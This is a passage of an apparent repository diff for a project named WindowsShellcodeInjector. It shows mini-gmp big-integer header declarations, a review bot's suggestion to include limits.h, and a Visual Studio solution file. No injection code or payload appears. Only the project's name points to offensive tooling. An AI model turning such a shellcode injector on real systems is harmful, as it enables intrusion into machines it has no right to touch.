     90 + mp_limb_t mpn_add(mp_ptr, mp_srcptr, mp_size_t, mp_srcptr, mp_size_t);
     91 + 
     92 + mp_limb_t mpn_sub_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
     93 + mp_limb_t mpn_sub_n(mp_ptr, mp_srcptr, mp_srcptr, mp_size_t);
     94 + mp_limb_t mpn_sub(mp_ptr, mp_srcptr, mp_size_t, mp_srcptr, mp_size_t);
     95 + 
     96 + mp_limb_t mpn_mul_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
     97 + mp_limb_t mpn_addmul_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
     98 + mp_limb_t mpn_submul_1(mp_ptr, mp_srcptr, mp_size_t, mp_limb_t);
     99 + 
     100 + mp_limb_t mpn_mul(mp_ptr, mp_srcptr, mp_size_t, mp_srcptr, mp_size_t);
     101 + void mpn_mul_n(mp_ptr, mp_srcptr, mp_srcptr, mp_size_t);
     102 + void mpn_sqr(mp_ptr, mp_srcptr, mp_size_t);
     103 + int mpn_perfect_square_p(mp_srcptr, mp_size_t);
     104 + mp_size_t mpn_sqrtrem(mp_ptr, mp_ptr, mp_srcptr, mp_size_t);
     105 + 
     106 + mp_limb_t mpn_lshift(mp_ptr, mp_srcptr, mp_size_t, unsigned int);
     107 + mp_limb_t mpn_rshift(mp_ptr, mp_srcptr, mp_size_t, unsigned int);
     108 + 
     109 + mp_bitcnt_t mpn_scan0(mp_srcptr, mp_bitcnt_t);
     110 + mp_bitcnt_t mpn_scan1(mp_srcptr, mp_bitcnt_t);
     111 + 
     112 + void mpn_com(mp_ptr, mp_srcptr, mp_size_t);
     113 + mp_limb_t mpn_neg(mp_ptr, mp_srcptr, mp_size_t);
     114 + 
     115 + mp_bitcnt_t mpn_popcount(mp_srcptr, mp_size_t);
     116 + 
     117 + mp_limb_t mpn_invert_3by2(mp_limb_t, mp_limb_t);
     118 +#define mpn_invert_limb(x) mpn_invert_3by2 ((x), 0)
     119 + 
     120 + size_t mpn_get_str(unsigned char *, int, mp_ptr, mp_size_t);
     121 + mp_size_t mpn_set_str(mp_ptr, const unsigned char *, size_t, int);
     122 + 
     123 + void mpz_init(mpz_t);
     124 + void mpz_init2(mpz_t, mp_bitcnt_t);
     125 + void mpz_clear(mpz_t);
     126 + 
     127 +#define mpz_odd_p(z) (((z)->_mp_size != 0) & (int) (z)->_mp_d[0])
     128 +#define mpz_even_p(z) (! mpz_odd_p (z))
     129 + 
     130 + int mpz_sgn(const mpz_t);
     131 + int mpz_cmp_si(const mpz_t, long);
     132 + int mpz_cmp_ui(const mpz_t, unsigned long);
     133 + int mpz_cmp(const mpz_t, const mpz_t);
     134 + int mpz_cmpabs_ui(const mpz_t, unsigned long);
     135 + int mpz_cmpabs(const mpz_t, const mpz_t);
     136 + int mpz_cmp_d(const mpz_t, double);
     137 + int mpz_cmpabs_d(const mpz_t, double);
     138 + 
     139 + void mpz_abs(mpz_t, const mpz_t);
     140 + void mpz_neg(mpz_t, const mpz_t);
     141 + void mpz_swap(mpz_t, mpz_t);
     142 + 
     143 + void mpz_add_ui(mpz_t, const mpz_t, unsigned long);
     144 + void mpz_add(mpz_t, const mpz_t, const mpz_t);
     145 + void mpz_sub_ui(mpz_t, const mpz_t, unsigned long);
     146 + void mpz_ui_sub(mpz_t, unsigned long, const mpz_t);
     147 + void mpz_sub(mpz_t, const mpz_t, const mpz_t);
     148 + 
     149 + void mpz_mul_si(mpz_t, const mpz_t, long int);
     150 + void mpz_mul_ui(mpz_t, const mpz_t, unsigned long int);
     151 + void mpz_mul(mpz_t, const mpz_t, const mpz_t);
     152 + void mpz_mul_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
     153 + void mpz_addmul_ui(mpz_t, const mpz_t, unsigned long int);
     154 + void mpz_addmul(mpz_t, const mpz_t, const mpz_t);
     155 + void mpz_submul_ui(mpz_t, const mpz_t, unsigned long int);
     156 + void mpz_submul(mpz_t, const mpz_t, const mpz_t);
     157 + 
     158 + void mpz_cdiv_qr(mpz_t, mpz_t, const mpz_t, const mpz_t);
     159 + void mpz_fdiv_qr(mpz_t, mpz_t, const mpz_t, const mpz_t);
     160 + void mpz_tdiv_qr(mpz_t, mpz_t, const mpz_t, const mpz_t);
     161 + void mpz_cdiv_q(mpz_t, const mpz_t, const mpz_t);
     162 + void mpz_fdiv_q(mpz_t, const mpz_t, const mpz_t);
     163 + void mpz_tdiv_q(mpz_t, const mpz_t, const mpz_t);
     164 + void mpz_cdiv_r(mpz_t, const mpz_t, const mpz_t);
     165 + void mpz_fdiv_r(mpz_t, const mpz_t, const mpz_t);
     166 + void mpz_tdiv_r(mpz_t, const mpz_t, const mpz_t);
     167 + 
     168 + void mpz_cdiv_q_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
     169 + void mpz_fdiv_q_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
     170 + void mpz_tdiv_q_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
     171 + void mpz_cdiv_r_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
     172 + void mpz_fdiv_r_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
     173 + void mpz_tdiv_r_2exp(mpz_t, const mpz_t, mp_bitcnt_t);
     174 + 
     175 + void mpz_mod(mpz_t, const mpz_t, const mpz_t);
     176 + 
     177 + void mpz_divexact(mpz_t, const mpz_t, const mpz_t);
     178 + 
     179 + int mpz_divisible_p(const mpz_t, const mpz_t);
     180 + int mpz_congruent_p(const mpz_t, const mpz_t, const mpz_t);
     181 + 
     182 + unsigned long mpz_cdiv_qr_ui(mpz_t, mpz_t, const mpz_t, unsigned long);
     183 + unsigned long mpz_fdiv_qr_ui(mpz_t, mpz_t, const mpz_t, unsigned long);
     184 + unsigned long mpz_tdiv_qr_ui(mpz_t, mpz_t, const mpz_t, unsigned long);
     185 + unsigned long mpz_cdiv_q_ui(mpz_t, const mpz_t, unsigned long);
     186 + unsigned long mpz_fdiv_q_ui(mpz_t, const mpz_t, unsigned long);
     187 + unsigned long mpz_tdiv_q_ui(mpz_t, const mpz_t, unsigned long);
     188 + unsigned long mpz_cdiv_r_ui(mpz_t, const mpz_t, unsigned long);
     189 + unsigned long mpz_fdiv_r_ui(mpz_t, const mpz_t, unsigned long);
     190 + unsigned long mpz_tdiv_r_ui(mpz_t, const mpz_t, unsigned long);
     191 + unsigned long mpz_cdiv_ui(const mpz_t, unsigned long);
     192 + unsigned long mpz_fdiv_ui(const mpz_t, unsigned long);
     193 + unsigned long mpz_tdiv_ui(const mpz_t, unsigned long);
     194 + 
     195 + unsigned long mpz_mod_ui(mpz_t, const mpz_t, unsigned long);
     196 + 
     197 + void mpz_divexact_ui(mpz_t, const mpz_t, unsigned long);
     198 + 
     199 + int mpz_divisible_ui_p(const mpz_t, unsigned long);
     200 + 
     201 + unsigned long mpz_gcd_ui(mpz_t, const mpz_t, unsigned long);
     202 + void mpz_gcd(mpz_t, const mpz_t, const mpz_t);
     203 + void mpz_gcdext(mpz_t, mpz_t, mpz_t, const mpz_t, const mpz_t);
     204 + void mpz_lcm_ui(mpz_t, const mpz_t, unsigned long);
     205 + void mpz_lcm(mpz_t, const mpz_t, const mpz_t);
     206 + int mpz_invert(mpz_t, const mpz_t, const mpz_t);
     207 + 
     208 + void mpz_sqrtrem(mpz_t, mpz_t, const mpz_t);
     209 + void mpz_sqrt(mpz_t, const mpz_t);
     210 + int mpz_perfect_square_p(const mpz_t);
     211 + 
     212 + void mpz_pow_ui(mpz_t, const mpz_t, unsigned long);
     213 + void mpz_ui_pow_ui(mpz_t, unsigned long, unsigned long);
     214 + void mpz_powm(mpz_t, const mpz_t, const mpz_t, const mpz_t);
     215 + void mpz_powm_ui(mpz_t, const mpz_t, unsigned long, const mpz_t);
     216 + 
     217 + void mpz_rootrem(mpz_t, mpz_t, const mpz_t, unsigned long);
     218 + int mpz_root(mpz_t, const mpz_t, unsigned long);
     219 + 
     220 + void mpz_fac_ui(mpz_t, unsigned long);
     221 + void mpz_bin_uiui(mpz_t, unsigned long, unsigned long);
     222 + 
     223 + int mpz_probab_prime_p(const mpz_t, int);
     224 + 
     225 + int mpz_tstbit(const mpz_t, mp_bitcnt_t);
     226 + void mpz_setbit(mpz_t, mp_bitcnt_t);
     227 + void mpz_clrbit(mpz_t, mp_bitcnt_t);
     228 + void mpz_combit(mpz_t, mp_bitcnt_t);
     229 + 
     230 + void mpz_com(mpz_t, const mpz_t);
     231 + void mpz_and(mpz_t, const mpz_t, const mpz_t);
     232 + void mpz_ior(mpz_t, const mpz_t, const mpz_t);
     233 + void mpz_xor(mpz_t, const mpz_t, const mpz_t);
     234 + 
     235 + mp_bitcnt_t mpz_popcount(const mpz_t);
     236 + mp_bitcnt_t mpz_hamdist(const mpz_t, const mpz_t);
     237 + mp_bitcnt_t mpz_scan0(const mpz_t, mp_bitcnt_t);
     238 + mp_bitcnt_t mpz_scan1(const mpz_t, mp_bitcnt_t);
     239 + 
     240 + int mpz_fits_slong_p(const mpz_t);
     241 + int mpz_fits_ulong_p(const mpz_t);
     242 + long int mpz_get_si(const mpz_t);
     243 + unsigned long int mpz_get_ui(const mpz_t);
     244 + double mpz_get_d(const mpz_t);
     245 + size_t mpz_size(const mpz_t);
     246 + mp_limb_t mpz_getlimbn(const mpz_t, mp_size_t);
     247 + 
     248 + void mpz_realloc2(mpz_t, mp_bitcnt_t);
     249 + mp_srcptr mpz_limbs_read(mpz_srcptr);
     250 + mp_ptr mpz_limbs_modify(mpz_t, mp_size_t);
     251 + mp_ptr mpz_limbs_write(mpz_t, mp_size_t);
     252 + void mpz_limbs_finish(mpz_t, mp_size_t);
     253 + mpz_srcptr mpz_roinit_n(mpz_t, mp_srcptr, mp_size_t);
     254 + 
     255 +#define MPZ_ROINIT_N(xp, xs) {{0, (xs),(xp) }}
     256 + 
     257 + void mpz_set_si(mpz_t, signed long int);
     258 + void mpz_set_ui(mpz_t, unsigned long int);
     259 + void mpz_set(mpz_t, const mpz_t);
     260 + void mpz_set_d(mpz_t, double);
     261 + 
     262 + void mpz_init_set_si(mpz_t, signed long int);
     263 + void mpz_init_set_ui(mpz_t, unsigned long int);
     264 + void mpz_init_set(mpz_t, const mpz_t);
     265 + void mpz_init_set_d(mpz_t, double);
     266 + 
     267 + size_t mpz_sizeinbase(const mpz_t, int);
     268 + char *mpz_get_str(char *, int, const mpz_t);
     269 + int mpz_set_str(mpz_t, const char *, int);
     270 + int mpz_init_set_str(mpz_t, const char *, int);
     271 + 
     272 + /* This long list taken from gmp.h. */
     273 + /* For reference, "defined(EOF)" cannot be used here. In g++ 2.95.4,
     274 + <iostream> defines EOF but not FILE. */
     275 +#if defined (FILE) \
     276 + || defined (H_STDIO) \
     277 + || defined (_H_STDIO) /* AIX */ \
     278 + || defined (_STDIO_H) /* glibc, Sun, SCO */ \
     279 + || defined (_STDIO_H_) /* BSD, OSF */ \
     280 + || defined (__STDIO_H) /* Borland */ \
     281 + || defined (__STDIO_H__) /* IRIX */ \
     282 + || defined (_STDIO_INCLUDED) /* HPUX */ \
     283 + || defined (__dj_include_stdio_h_) /* DJGPP */ \
     284 + || defined (_FILE_DEFINED) /* Microsoft */ \
     285 + || defined (__STDIO__) /* Apple MPW MrC */ \
     286 + || defined (_MSL_STDIO_H) /* Metrowerks */ \
     287 + || defined (_STDIO_H_INCLUDED) /* QNX4 */ \
     288 + || defined (_ISO_STDIO_ISO_H) /* Sun C++ */ \
     289 + || defined (__STDIO_LOADED) /* VMS */
     290 + size_t mpz_out_str(FILE *, int, const mpz_t);
     291 +#endif
     292 + 
     293 + void mpz_import(mpz_t, size_t, int, size_t, int, size_t, const void *);
     294 + void *mpz_export(void *, size_t *, int, size_t, int, size_t, const mpz_t);
     295 + 
     296 +#if defined (__cplusplus)
     297 +}
     298 +#endif
     299 + 
     300 +// additional defines that some program uses
     301 +#ifndef GMP_LIMB_BITS
     302 +#define GMP_LIMB_BITS (sizeof(mp_limb_t) * CHAR_BIT)
     303 +#endif
     304 +#ifndef GMP_NAIL_BITS
     305 +#define GMP_NAIL_BITS 0
     306 +#endif
     307 +#ifndef GMP_NUMB_BITS
     308 +#define GMP_NUMB_BITS GMP_LIMB_BITS
     309 +#endif
     310 + 
     311 + 
     312 +#endif /* __MINI_GMP_H__ */
     313 + 
     314 + 
     315 + 
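Review bot: The `/* for CHAR_BIT */` comment on line 43 is not followed by any include, yet `GMP_LIMB_BITS` on line 302 expands to `sizeof(mp_limb_t) * CHAR_BIT`. Add `#include <limits.h>` after line 43 so the macro does not depend on the including file having pulled that header in first.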
  • WindowsShellcodeInjector/mini-gmpxx.h
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    WindowsShellcodeInjector.sln
     1 +
     2 +Microsoft Visual Studio Solution File, Format Version 12.00
     3 +# Visual Studio 15
     4 +VisualStudioVersion = 15.0.28307.1525
     5 +MinimumVisualStudioVersion = 10.0.40219.1
     6 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WindowsShellcodeInjector", "WindowsShellcodeInjector\WindowsShellcodeInjector.vcxproj", "{895F5563-64DA-4642-8577-0C5AF67D8F0A}"
     7 +EndProject
     8 +Global
     9 + GlobalSection(SolutionConfigurationPlatforms) = preSolution
     10 + Debug|x64 = Debug|x64
     11 + Debug|x86 = Debug|x86
     12 + Release|x64 = Release|x64
     13 + Release|x86 = Release|x86
     14 + EndGlobalSection
     15 + GlobalSection(ProjectConfigurationPlatforms) = postSolution
     16 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug|x64.ActiveCfg = Debug|x64
     17 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug|x64.Build.0 = Debug|x64
     18 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug|x86.ActiveCfg = Debug|Win32
     19 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug|x86.Build.0 = Debug|Win32
     20 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release|x64.ActiveCfg = Release|x64
     21 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release|x64.Build.0 = Release|x64
     22 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release|x86.ActiveCfg = Release|Win32
     23 + {895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release|x86.Build.0 = Release|Win32
     24 + EndGlobalSection
     25 + GlobalSection(SolutionProperties) = preSolution
     26 + HideSolutionNode = FALSE
     27 + EndGlobalSection
     28 + GlobalSection(ExtensibilityGlobals) = postSolution
     29 + SolutionGuid = {7E0E7CF6-0C38-45B4-81F4-D95EA44EB1F5}
     30 + EndGlobalSection
     31 +EndGlobal
     32 + 